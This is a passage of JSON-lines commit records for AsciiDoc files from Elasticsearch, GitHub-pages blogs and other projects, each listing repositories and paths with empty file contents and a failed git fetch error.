mpion\/elasticsearch,rajanm\/elasticsearch,cnfire\/elasticsearch-1,yynil\/elasticsearch,kalburgimanjunath\/elasticsearch,mikemccand\/elasticsearch,yynil\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,xingguang2013\/elasticsearch,wenpos\/elasticsearch,elasticdog\/elasticsearch,jchampion\/elasticsearch,C-Bish\/elasticsearch,wenpos\/elasticsearch,yanjunh\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra5-rc,JackyMai\/elasticsearch,petabytedata\/elasticsearch,sdauletau\/elasticsearch,kunallimaye\/elasticsearch,scottsom\/elasticsearch,markharwood\/elasticsearch,ivansun1010\/elasticsearch,petabytedata\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,mmaracic\/elasticsearch,masterweb121\/elasticsearch,infusionsoft\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,AndreKR\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch,masterweb121\/elasticsearch,rlugojr\/elasticsearch,xingguang2013\/elasticsearch,scottsom\/elasticsearch,obourgain\/elasticsearch,andrejserafim\/elasticsearch,kalimatas\/elasticsearch,lmtwga\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,episerver\/elasticsearch,umeshdangat\/elasticsearch,fred84\/elasticsearch,glefloch\/elasticsearch,uschindler\/elasticsearch,jimczi\/elasticsearch,mapr\/elasticsearch,ricardocerq\/elasticsearch,polyfractal\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,YosuaMichael\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,nezirus\/elasticsearch,fred84\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,mapr\/elasticsearch,jeteve\/elasticsearch,F0lha\/elasticsearch,palecur\/elasticsearch,nrkkalyan\/elasticsearch,infusionsoft\/elasticsearch,shreejay\/elasticsearch,PhaedrusTheGreek\/elasticsearch,fforbeck\/elasticsearch,obourgain\/elasticsearch,cnfire\/elasticsearch-1,mjason3\/elasticsearch,HonzaKral\/elasticsearch,nezirus\/elasticsearch,andrestc\/elasticsearch,kalburgimanjunath\/elasticsearch,jprante\/elasticsearch,nomoa\/elasticsearch,sdauletau\/elasticsearch,wangtuo\/elasticsearch,petabytedata\/elasticsearch,obourgain\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,LewayneNaidoo\/elasticsearch,mjason3\/elasticsearch,myelin\/elasticsearch,wbowling\/elasticsearch,JSCooke\/elasticsearch,markharwood\/elasticsearch,nilabhsagar\/elasticsearch,tebriel\/elasticsearch,Helen-Zhao\/elasticsearch,episerver\/elasticsearch,ivansun1010\/elasticsearch,palecur\/elasticsearch,girirajsharma\/elasticsearch,i-am-Nathan\/elasticsearch,fernandozhu\/elasticsearch,martinstuga\/elasticsearch,F0lha\/elasticsearch,ZTE-PaaS\/elasticsearch,ESamir\/elasticsearch,mohit\/elasticsearch,snikch\/elasticsearch,socialrank\/elasticsearch,wuranbo\/elasticsearch,wbowling\/elasticsearch,karthikjaps\/elasticsearch,coding0011\/elasticsearch,PhaedrusTheGreek\/elasticsearch,onegambler\/elasticsearch,rmuir\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,dpursehouse\/elasticsearch,hafkensite\/elasticsearch,nrkkalyan\/elasticsearch,HonzaKral\/elasticsearch,lzo\/elasticsearch-1,weipinghe\/elasticsearch,jprante\/elasticsearch,diendt\/elasticsearch,yanjunh\/elasticsearch,s1monw\/elasticsearch,Stacey-Gammon\/elasticsearch,infusionsoft\/elasticsearch,xuzha\/elasticsearch,yynil\/elasticsearch,njlawton\/elasticsearch,gfyoung\/elasticsearch,kalburgimanjunath\/elasticsearch,GlenRSmith\/elasti
csearch,Shepard1212\/elasticsearch,bawse\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,uschindler\/elasticsearch,andrejserafim\/elasticsearch,onegambler\/elasticsearch,nknize\/elasticsearch,jeteve\/elasticsearch,iacdingping\/elasticsearch,myelin\/elasticsearch,liweinan0423\/elasticsearch,cwurm\/elasticsearch,markwalkom\/elasticsearch,ricardocerq\/elasticsearch,geidies\/elasticsearch,trangvh\/elasticsearch,rhoml\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,davidvgalbraith\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,PhaedrusTheGreek\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,tebriel\/elasticsearch,onegambler\/elasticsearch,PhaedrusTheGreek\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,artnowo\/elasticsearch,sreeramjayan\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,mapr\/elasticsearch,Helen-Zhao\/elasticsearch,nilabhsagar\/elasticsearch,andrestc\/elasticsearch,cwurm\/elasticsearch,geidies\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,caengcjd\/elasticsearch,mikemccand\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,AndreKR\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,cwurm\/elasticsearch,andrestc\/elasticsearch,andrestc\/elasticsearch,drewr\/elasticsearch,pozhidaevak\/elasticsearch,palecur\/elasticsearch,xuzha\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,markharwood\/elasticsearch,liweinan0423\/elasticsearch,liweinan0423\/elasticsearch,episerver\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,nomoa\/elasticsearch,iacdingping\/elasticsearch,iacdingping\/elasticsearch,IanvsPoplicola\/elasticsearch,mapr\/elasticsearch,polyfractal\/elasticsearch,gmarz\/elasticsearch,StefanGor\/elasticsearch,yynil\/elasticsearch,spiegela\/elasticsearch,martinstuga\/elasticsearch,caengcjd\/elasticsearch,lmtwga\/elasticsearch,rajanm\/elasticsearch,dpursehouse\/elasticsearch,iacdingping\/elasticsearch,gingerwizard\/elasticsearch,Rygbee\/elasticsearch,geidies\/elasticsearch,glefloch\/elasticsearch,kaneshin\/elasticsearch,infusionsoft\/elasticsearch,brandonkearby\/elasticsearch,a2lin\/elasticsearch,rmuir\/elasticsearch,strapdata\/elassandra,martinstuga\/elasticsearch,Helen-Zhao\/elasticsearch,kaneshin\/elasticsearch,rhoml\/elasticsearch,ricardocerq\/elasticsearch,IanvsPoplicola\/elasticsearch,gmarz\/elasticsearch,cnfire\/elasticsearch-1,sdauletau\/elasticsearch,jeteve\/elasticsearch,caengcjd\/elasticsearch,YosuaMichael\/elasticsearch,ESamir\/elasticsearch,glefloch\/elasticsearch,jeteve\/elasticsearch,jpountz\/elasticsearch,lmtwga\/elasticsearch,xuzha\/elasticsearch,markwalkom\/elasticsearch,fernandozhu\/elasticsearch,MaineC\/elasticsearch,mikemccand\/elasticsearch,avikurapati\/elasticsearch,episerver\/elasticsearch,nilabhsagar\/elasticsearch,Collaborne\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra5-rc,jeteve\/elasticsearch,jbertouch\/elasticsearch,xingguang2013\/elasticsearch,mmaracic\/elasticsearch,petabytedata\/elasticsearch,xuzha\/elasticsearch,MisterAndersen\/elasticsearch,karthikjaps\/elasticsearch,coding0011\/elasticsearch,caengcjd\/elasticsearch,caengcjd\/elasticsearch,zkidkid\/elasticsearch,nomoa\/elasticsearch,yynil\/elasticsearch,spiegela\/elasticsearch,pozhidaevak\/elasticsearch,glefloc
h\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,snikch\/elasticsearch,kunallimaye\/elasticsearch,caengcjd\/elasticsearch,LeoYao\/elasticsearch,bawse\/elasticsearch,sreeramjayan\/elasticsearch,HonzaKral\/elasticsearch,trangvh\/elasticsearch,clintongormley\/elasticsearch,ricardocerq\/elasticsearch,socialrank\/elasticsearch,mortonsykes\/elasticsearch,lks21c\/elasticsearch,jpountz\/elasticsearch,AndreKR\/elasticsearch,fred84\/elasticsearch,zkidkid\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,awislowski\/elasticsearch,kunallimaye\/elasticsearch,Helen-Zhao\/elasticsearch,davidvgalbraith\/elasticsearch,kalimatas\/elasticsearch,JackyMai\/elasticsearch,polyfractal\/elasticsearch,andrejserafim\/elasticsearch,infusionsoft\/elasticsearch,liweinan0423\/elasticsearch,C-Bish\/elasticsearch,girirajsharma\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch,JervyShi\/elasticsearch,mmaracic\/elasticsearch,markharwood\/elasticsearch,martinstuga\/elasticsearch,mortonsykes\/elasticsearch,YosuaMichael\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,kunallimaye\/elasticsearch,uschindler\/elasticsearch,rhoml\/elasticsearch,strapdata\/elassandra,sdauletau\/elasticsearch,JervyShi\/elasticsearch,awislowski\/elasticsearch,sdauletau\/elasticsearch,mikemccand\/elasticsearch,schonfeld\/elasticsearch,winstonewert\/elasticsearch,sneivandt\/elasticsearch,girirajsharma\/elasticsearch,petabytedata\/elasticsearch,F0lha\/elasticsearch,iacdingping\/elasticsearch,drewr\/elasticsearch,xingguang2013\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,kalburgimanjunath\/elasticsearch,MisterAndersen\/elasticsearch,davidvgalbraith\/elasticsearch,i-am-Nathan\/elasticsearch,jchampion\/elasticsearch,clintongormley\/elasticsearch,jbertouch\/elasticsearch,polyfractal\/elasticsearch,LeoYao\/elasticsearch,karthikjaps\/elasticsearch,wbowling\/elasticsearch,onegambler\/elasticsearch,pozhidaevak\/elasticsearch,martinstuga\/elasticsearch,xingguang2013\/elasticsearch,lzo\/elasticsearch-1,HonzaKral\/elasticsearch,henakamaMSFT\/elasticsearch,lmtwga\/elasticsearch,hafkensite\/elasticsearch,karthikjaps\/elasticsearch,schonfeld\/elasticsearch,fforbeck\/elasticsearch,kalburgimanjunath\/elasticsearch,gingerwizard\/elasticsearch,xingguang2013\/elasticsearch,MisterAndersen\/elasticsearch,jprante\/elasticsearch,robin13\/elasticsearch,wbowling\/elasticsearch,pozhidaevak\/elasticsearch,Shepard1212\/elasticsearch,yanjunh\/elasticsearch,IanvsPoplicola\/elasticsearch,sreeramjayan\/elasticsearch,kunallimaye\/elasticsearch,Rygbee\/elasticsearch,jpountz\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,dongjoon-hyun\/elasticsearch,schonfeld\/elasticsearch,diendt\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,schonfeld\/elasticsearch,avikurapati\/elasticsearch,lmtwga\/elasticsearch,IanvsPoplicola\/elasticsearch,episerver\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,jpountz\/elasticsearch,YosuaMichael\/elasticsearch,strapdata\/elassandra5-rc,sdauletau\/elasticsearch,fforbeck\/elasticsearch,areek\/elasticsearch,s1monw\/elasticsearch,shreejay\/elasticsearch,tebriel\/elasticsearch,Collaborne\/elasticsearch,diendt\/elasticsearch,clintongormley\/elasticsearch,fforbeck\/elasticsearch,qwerty4030\/elasticsearch,andrejserafim\/elasticsearch
,scottsom\/elasticsearch,rhoml\/elasticsearch,nezirus\/elasticsearch,masterweb121\/elasticsearch,awislowski\/elasticsearch,camilojd\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elassandra,girirajsharma\/elasticsearch,areek\/elasticsearch,jprante\/elasticsearch,vroyer\/elassandra,YosuaMichael\/elasticsearch,trangvh\/elasticsearch,clintongormley\/elasticsearch,hafkensite\/elasticsearch,s1monw\/elasticsearch,dpursehouse\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,lzo\/elasticsearch-1,camilojd\/elasticsearch,masterweb121\/elasticsearch,jimczi\/elasticsearch,girirajsharma\/elasticsearch,uschindler\/elasticsearch,Collaborne\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,ZTE-PaaS\/elasticsearch,karthikjaps\/elasticsearch,lmtwga\/elasticsearch,brandonkearby\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,onegambler\/elasticsearch,masaruh\/elasticsearch,henakamaMSFT\/elasticsearch,markharwood\/elasticsearch,njlawton\/elasticsearch,Rygbee\/elasticsearch,iacdingping\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,kalburgimanjunath\/elasticsearch,schonfeld\/elasticsearch,weipinghe\/elasticsearch,onegambler\/elasticsearch,yanjunh\/elasticsearch,winstonewert\/elasticsearch,tebriel\/elasticsearch,C-Bish\/elasticsearch,davidvgalbraith\/elasticsearch,lzo\/elasticsearch-1,mjason3\/elasticsearch,artnowo\/elasticsearch,kalburgimanjunath\/elasticsearch,MaineC\/elasticsearch,infusionsoft\/elasticsearch,rhoml\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,StefanGor\/elasticsearch,kunallimaye\/elasticsearch,camilojd\/elasticsearch,jbertouch\/elasticsearch,gmarz\/elasticsearch,dongjoon-hyun\/elasticsearch,bawse\/elasticsearch,rmuir\/elasticsearch,vroyer\/elasticassandra,nknize\/elasticsearch,fernandozhu\/elasticsearch,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,kalimatas\/elasticsearch,snikch\/elasticsearch,LewayneNaidoo\/elasticsearch,nomoa\/elasticsearch,hafkensite\/elasticsearch,xingguang2013\/elasticsearch,hafkensite\/elasticsearch,snikch\/elasticsearch,kaneshin\/elasticsearch,clintongormley\/elasticsearch,gingerwizard\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra,martinstuga\/elasticsearch,areek\/elasticsearch,C-Bish\/elasticsearch,infusionsoft\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,wbowling\/elasticsearch,umeshdangat\/elasticsearch,nrkkalyan\/elasticsearch,cnfire\/elasticsearch-1,henakamaMSFT\/elasticsearch,strapdata\/elassandra,socialrank\/elasticsearch,areek\/elasticsearch,ivansun1010\/elasticsearch,snikch\/elasticsearch,maddin2016\/elasticsearch,vroyer\/elassandra,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,andrejserafim\/elasticsearch,kalimatas\/elasticsearch,LewayneNaidoo\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra5-rc,davidvgalbraith\/elasticsearch,yynil\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,nrkkalyan\/elasticsearch,bawse\/elasticsearch,elasticdog\/elasticsearch,Rygbee\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,rmuir\/elasticsearch,cwurm\/elasticsearch,ZTE-PaaS\/elasticsearch,awislowski\/elasticsearch,nknize\/elasticsearch,lzo\/elasticsearch-1,wuranbo\/elasticsearch,JervyShi\/elasticsearch,petabytedata\/elasticsearch,avikurapati\/elasticsearch,lmtwga\/elasticsearch,jchampion\/elasticsearch,Stacey-Gammon\/elasticsearch,trangvh\/elasticsearch,ivansun1010\/elasticsearch,drewr\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_query_refactoring.asciidoc","new_file":"docs\/reference\/migration\/migrate_query_refactoring.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"4faf3cf02ca44f64bf89ac043e57dbdd12107281","subject":"Add docs for error file configuration (#29032)","message":"Add docs for error file configuration (#29032)\n\nThis commit adds docs for configuring the error file setting for where\r\nthe JVM writes fatal error logs.","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/setup\/important-settings\/error-file.asciidoc","new_file":"docs\/reference\/setup\/important-settings\/error-file.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
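Editor's note on the record above: it concerns Elasticsearch's `error-file.asciidoc`, which documents where the JVM writes its fatal error log. A minimal sketch of what such a setting looks like, assuming a packaged install whose log directory is `/var/log/elasticsearch` (that path is an assumption for illustration; the `-XX:ErrorFile` flag itself and its `%p` PID placeholder are standard HotSpot options):

[source,options]
----
# jvm.options: send HotSpot fatal error logs (hs_err_pid*.log) to a known
# location; %p expands to the PID of the crashed JVM process.
# The directory below is illustrative, not taken from the record.
-XX:ErrorFile=/var/log/elasticsearch/hs_err_pid%p.log
----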
{"commit":"10fb13ab196c36eef70d87719c5b47cff6bf46e2","subject":"Update 2015-05-03-test.adoc","message":"Update 2015-05-03-test.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2015-05-03-test.adoc","new_file":"_posts\/2015-05-03-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"cc1f0187d617bbca982b1c7ed394fb9bfc867e19","subject":"Update 2016-04-13-Puzzle-2-H-Hack-Me-If-You-Can.adoc","message":"Update 2016-04-13-Puzzle-2-H-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-13-Puzzle-2-H-Hack-Me-If-You-Can.adoc","new_file":"_posts\/2016-04-13-Puzzle-2-H-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"fe0bf2a5f948f1c14c18aa52081686afc59fcfa4","subject":"Update 2017-05-13-Der-Rechtsraum-im-Rechtsstaat.adoc","message":"Update 2017-05-13-Der-Rechtsraum-im-Rechtsstaat.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-13-Der-Rechtsraum-im-Rechtsstaat.adoc","new_file":"_posts\/2017-05-13-Der-Rechtsraum-im-Rechtsstaat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e7ed50b1886c617e1972184665ea9db2687d82d7","subject":"Renamed '_posts\/2019-05-15-Where-is-Prateek.adoc' to '_posts\/2019-05-15-Where-is-Prateek-a-Unity-Game.adoc'","message":"Renamed '_posts\/2019-05-15-Where-is-Prateek.adoc' to '_posts\/2019-05-15-Where-is-Prateek-a-Unity-Game.adoc'","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2019-05-15-Where-is-Prateek-a-Unity-Game.adoc","new_file":"_posts\/2019-05-15-Where-is-Prateek-a-Unity-Game.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b8b49c2c4b65b3df242f8f905972778e4bd26fcd","subject":"Update 2015-10-02-Software-architecture-like-a-building-own-house.adoc","message":"Update 2015-10-02-Software-architecture-like-a-building-own-house.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2015-10-02-Software-architecture-like-a-building-own-house.adoc","new_file":"_posts\/2015-10-02-Software-architecture-like-a-building-own-house.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"73d6b6e195c02017fe6a9c519553885524d2678d","subject":"Create free_skymaps.adoc","message":"Create free_skymaps.adoc\n\nAdded tutorial on skymap creation.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/free_skymaps.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/free_skymaps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"}
{"commit":"719f98a4171abe0105fc15519335354088833cff","subject":"y2b create post My Ultimate Setup - Episode 1","message":"y2b create post My Ultimate Setup - Episode 1","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-17-My-Ultimate-Setup--Episode-1.adoc","new_file":"_posts\/2015-03-17-My-Ultimate-Setup--Episode-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"aa6969d45eded36ead3151fd7c7c218e37cfa03c","subject":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f96ab793e00f73bbb8653aa7080c2c8094c6f515","subject":"Update 2017-12-24-Episode-122-A-Very-Herculean-Festivus.adoc","message":"Update 2017-12-24-Episode-122-A-Very-Herculean-Festivus.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-12-24-Episode-122-A-Very-Herculean-Festivus.adoc","new_file":"_posts\/2017-12-24-Episode-122-A-Very-Herculean-Festivus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b2a4828a074ce6844ef5b05f143b354856f0f57a","subject":"Fix package name for JavaEsSpark in example.","message":"Fix package name for JavaEsSpark in example.\n\nThe package name in the text has an extra `hadoop` in it, and in the code example `java` and `api` are swapped. Hopefully this is fixed before someone else wastes several hours trying to figure out why the example doesn't build.\n","repos":"lgscofield\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
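Editor's note on the commit above: it pins down the correct package for the elasticsearch-hadoop Spark Java API. A minimal sketch of the corrected usage, assuming the `elasticsearch-hadoop` artifact is on the classpath; the app name, master URL, node address, and the `spark/docs` index are illustrative assumptions, while the import path and `JavaEsSpark.saveToEs` call are the API the commit message refers to:

[source,java]
----
// Correct package per the fix: org.elasticsearch.spark.rdd.api.java -
// no extra "hadoop" segment, and "api" comes before "java".
import org.elasticsearch.spark.rdd.api.java.JavaEsSpark;

import org.apache.spark.SparkConf;
import org.apache.spark.api.java.JavaRDD;
import org.apache.spark.api.java.JavaSparkContext;

import java.util.Arrays;
import java.util.Collections;
import java.util.Map;

public class EsSparkDemo {
    public static void main(String[] args) {
        SparkConf conf = new SparkConf()
                .setAppName("es-spark-demo")        // illustrative
                .setMaster("local[*]")              // illustrative
                .set("es.nodes", "localhost:9200"); // illustrative ES node
        JavaSparkContext jsc = new JavaSparkContext(conf);

        // One trivial document, saved to an illustrative index/type.
        Map<String, String> doc = Collections.singletonMap("message", "hello");
        JavaRDD<Map<String, String>> rdd = jsc.parallelize(Arrays.asList(doc));
        JavaEsSpark.saveToEs(rdd, "spark/docs");

        jsc.stop();
    }
}
----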
{"commit":"f020e9e4863c23c319b2417a22d89e5ba0135050","subject":"Create README for installing Linux","message":"Create README for installing Linux\n\nDescribed the benefits and disadvantages for both dual booting and using virtual\nmachine and provided links on how to install both ways\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Development-Guide\/How-To-Install-Linux\/README.adoc","new_file":"Development-Guide\/How-To-Install-Linux\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"}
{"commit":"d0ad464c7edf0be54661bc460bbf14834510a596","subject":"add documention how to use sahi with webpack-dev-server, closes #295","message":"add documention how to use sahi with webpack-dev-server, closes #295\n","repos":"ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli","old_file":"docs\/manual\/testdefinition\/advanced-topics\/sahi-webpack.adoc","new_file":"docs\/manual\/testdefinition\/advanced-topics\/sahi-webpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ConSol\/sakuli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
